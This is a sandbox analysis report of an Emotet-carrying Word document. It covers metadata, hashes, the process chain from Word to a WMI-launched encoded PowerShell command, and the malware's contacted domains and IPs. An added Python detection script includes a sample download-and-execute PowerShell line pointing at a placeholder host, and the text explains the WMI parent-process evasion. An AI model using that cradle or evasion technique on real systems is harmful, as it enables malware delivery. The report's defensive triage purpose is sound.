File name: | FILE_XR0MIZZQPIFRMI_W.doc |
Full analysis: | https://app.any.run/tasks/eff5691f-8ed2-441b-a8c5-43734e0ad3ed |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans in circulation. Over its lifetime it has been upgraded into a highly destructive piece of malware. It mainly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:27:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Handcrafted Steel Computer, Subject: 5th generation, Author: Terry Dibbert, Comments: blue intranet, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 0891E26FB93F15A52557B4F8C1FB696D |
SHA1: | 5EEB2521293E41696071F1287B62E38373B42E1E |
SHA256: | F413E1B7C64A5C2A3CF534B1F2461C57F3F4CD409797F3B63EE5F2714F3F9C22 |
SSDEEP: | 6144:VG1qmTgpbxDj2kCUSfp40YTPLkIq7NSU4jJntATfDkBlPi7Q:VG1qmTgpbxDj2kCUSfp40Y/Xq7NSU4VV |
Extension | Identification | Match (%)
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Title: | Handcrafted Steel Computer |
---|---|
Subject: | 5th generation |
Author: | Terry Dibbert |
Keywords: | - |
Comments: | blue intranet |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:32:00 |
ModifyDate: | 2019:09:18 14:32:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Heaney Inc |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
Manager: | Parker |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2776 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\FILE_XR0MIZZQPIFRMI_W.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3784 | powershell -encod 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

The parent of powershell.exe (PID 3784) is wmiprvse.exe, the WMI provider host, not WINWORD.EXE: the macro started the command through WMI, so a detection rule that only watches for Office processes spawning PowerShell never sees this chain. The switch is also abbreviated (-encod); powershell.exe accepts any unambiguous prefix of -EncodedCommand.
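The following script is an added example, not part of the ANY.RUN report. It shows the triage logic a responder would run over process-creation records for the chain in the table above: flag PowerShell whose parent is wmiprvse.exe (or an Office binary), recognise the abbreviated -EncodedCommand switch, and decode the blob. The events and the stage-2 command are constructed; the report's real encoded command is not reproduced on the page, and PID 4100 is invented for contrast.

```python
"""Triage helper for the spawn chain in the process table above: powershell.exe
launched by wmiprvse.exe with an abbreviated -EncodedCommand switch.

Added example, not part of the ANY.RUN report.  The events below are constructed
(the report's real encoded command is not reproduced on the page).
"""
import base64
import re

# Parents that have no business starting PowerShell on a workstation.  wmiprvse.exe
# appears when a macro runs the command through WMI (Win32_Process.Create), which
# hides the Word -> PowerShell edge from parent/child rules.
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "winword.exe", "excel.exe", "powerpnt.exe"}

# Split a Windows command line into quoted or whitespace-delimited tokens.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def image_name(path):
    """Lowercase file name of an image path, directory and quotes stripped."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encoded_command_arg(command_line):
    """Return the base64 blob after an -EncodedCommand switch, or None.

    powershell.exe accepts any unambiguous prefix of a switch name, so -e, -ec,
    -enc and -encod (the form in the report) all select -EncodedCommand.
    Matching on the literal "-EncodedCommand" alone misses every one of them.
    """
    tokens = _TOKEN.findall(command_line)
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        name = tok[1:].lower()
        if name.startswith("e") and "encodedcommand".startswith(name):
            return tokens[i + 1].strip('"')
    return None


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; raises on a bad blob."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def triage(events):
    """Flag PowerShell process-creation events matching the report's pattern.

    Each event is a dict with pid, image, parent_image and command_line, the
    fields a Sysmon Event ID 1 or EDR process record provides.  Severity is
    'high' when the parent is suspicious, 'medium' when only an encoded
    command is present.
    """
    findings = []
    for ev in events:
        if image_name(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = image_name(ev["parent_image"])
        b64 = encoded_command_arg(ev["command_line"])
        if parent not in SUSPICIOUS_PARENTS and b64 is None:
            continue
        finding = {
            "pid": ev["pid"],
            "parent": parent,
            "severity": "high" if parent in SUSPICIOUS_PARENTS else "medium",
            "decoded": None,
        }
        if b64 is not None:
            try:
                finding["decoded"] = decode_encoded_command(b64)
            except (ValueError, UnicodeDecodeError):
                pass  # truncated or tampered blob: still report, without the decode
        findings.append(finding)
    return findings


# Constructed stage-2 command and its encoding, standing in for the elided blob.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed events modelled on the table above (PIDs 2776 and 3784 from the
# report; PID 4100 is an invented benign admin script for contrast).
SAMPLE_EVENTS = [
    {"pid": 2776,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                     r'"C:\Users\admin\Downloads\FILE_XR0MIZZQPIFRMI_W.doc"'},
    {"pid": 3784,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\wmiprvse.exe",
     "command_line": "powershell -encod " + SAMPLE_B64},
    {"pid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["pid"], hit["severity"], hit["parent"], hit["decoded"])
```

Running it flags only PID 3784 (high: parent wmiprvse.exe, encoded command decoded); the WINWORD.EXE launch and the -File invocation from explorer.exe pass. The decode step is kept separate from the match so a corrupt blob still produces a finding rather than an exception.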
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8A05.tmp.cvr | — | — | —
2776 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\FILE_XR0MIZZQPIFRMI_W.doc.LNK | lnk | D7262BCC101D083235CA31B9119E341F | 730EB67874FCE093948C2B415299F4CF3055CB250EAFB2CCAE27C7DCE53F5194
2776 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 0D242A0DEFC206484428169450C9D9F7 | A141C62F5271596F4CF644E986BD2801D93F3D036AD56E38ADD093E74151B535
2776 | WINWORD.EXE | C:\Users\admin\Downloads\~$LE_XR0MIZZQPIFRMI_W.doc | pgc | 3A688D09AC7460C53E953D56F2D47EC7 | 396EC2A4234BCC1E1765568019126E048CECC3B0B1922F35AD1065E853777463
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16C97518.wmf | wmf | 88A1919A52A566ECD7EC642242223934 | 68CA5E056DC7C71AB16695D571D1525212CAA13B976BA77FC7DBD21AF20770A0
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B4DED62.wmf | wmf | 597872C11ED292C466AB6B41973A1DC9 | 504B99306569BEF0BAB66452F7FAA1F4C019337591DA88D20F507001DC2D8928
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E1C19FB.wmf | wmf | A18664F7ECAA30815A432A8A54CD642E | A15CC5E4E029315D316201FAF3DA847B3E3FEC3C454E2D7A3DF5737EFB56152A
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF7103A5.wmf | wmf | CE7E85FB3F9A5F8D0DD3F95AD6016FB0 | E9DA5AD29CFBFE95FAE9605C270E1F009F7DEA5DC2856F4EC8C5D843FAD3F92A
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AF242FA.wmf | wmf | AD736CD196000389A578EEDCA155DAE0 | 7C36C967B8A8EA18247EF24337AB88030E6DF5F149B9404D3721D2E178878EA6
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | E60BBDE8905DE4B6D05AD60A8D5D8D1C | DB1A1DCBE69F4C7FE43E54F0B9AA54910FEB62AF3C52CDEED01F8357E82F3C2F
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3784 | powershell.exe | 104.248.24.81:443 | www.supercrystal.am | — | US | unknown |
3784 | powershell.exe | 111.67.206.122:443 | pipizhanzhang.com | China Unicom Beijing Province Network | CN | unknown |
3784 | powershell.exe | 213.186.33.186:443 | hotel-bristol.lu | OVH SAS | FR | suspicious |
3784 | powershell.exe | 148.251.180.153:443 | www.patrickglobalusa.com | Hetzner Online GmbH | DE | malicious |
3784 | powershell.exe | 103.221.222.16:443 | tankhoi.vn | The Corporation for Financing & Promoting Technology | VN | unknown |
Domain | IP | Reputation
---|---|---
www.patrickglobalusa.com | — | malicious
pipizhanzhang.com | — | unknown
tankhoi.vn | — | unknown
www.supercrystal.am | — | unknown
hotel-bristol.lu | — | suspicious